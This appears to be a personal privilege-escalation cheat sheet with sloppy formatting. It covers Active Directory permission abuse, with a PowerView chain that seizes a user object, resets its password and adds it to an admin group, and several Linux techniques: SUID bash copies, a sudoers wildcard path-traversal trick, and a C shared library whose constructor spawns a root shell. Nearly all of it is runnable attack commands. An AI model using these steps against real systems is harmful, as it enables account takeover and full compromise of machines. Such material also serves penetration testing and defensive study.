Windows PrivEsc
Some of the Active Directory object permissions and types that we as attackers are interested in:
1. GenericAll – full rights to the object (add users to a group or reset user’s password)
2. GenericWrite – update object’s attributes (i.e logon script)
3. WriteOwner – change object owner to attacker controlled user take over the object
4. WriteDACL – modify object’s ACEs and give attacker full control right over the object
5. AllExtendedRights – ability to add user to a group or reset password
6. ForceChangePassword – ability to change user’s password
7. Self (Self-Membership) – ability to add yourself to a group
>icacls [file/folder]Check the DACL(Discretionary Access Control List)
>Set-DomainObjectOwner -identity claire -OwnerIdentity tom; Add-DomainObjectAcl -Tar
getIdentity claire -PrincipalIdentity tom -Rights ResetPassword; $cred = ConvertTo-SecureString "qwer1234QWER!@#$" -AsPlainText
-force; Set-DomainUserPassword -identity claire -accountpassword $cred>net group backup_admins claire /addasd
Linux PrivEsc
>chmod u+s /bin/bash
>chmod 4755 /bin/bash
>bash -p
>./bash -pModify bash’s SUID and PrivEsc by option p
>cp /bin/bash /bin/privesc
>chmod 6667 /bin/privesc
>/bin/privesc -pCopy another bash and set SUID
>sudo -l -l
....
Sudoers entry:
RunAsUsers: ALL
Commands:
/usr/bin/node /usr/tmp/*.jsWildcard can be abused. The cmd “/usr/bin/node /usr/tmp/../../home/user/exploit.js” can be executed since the wildcard accepts everything.
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
void method()__attribute__((constructor));
void method(){
system("/bin/bash -i");
}
>gcc -shared -fpic -o .config/libcounter.so PrivEsc.cCompile the C++ code to so file, and let the application executed by superuser to load the libcounter.so to have the PrivEsc
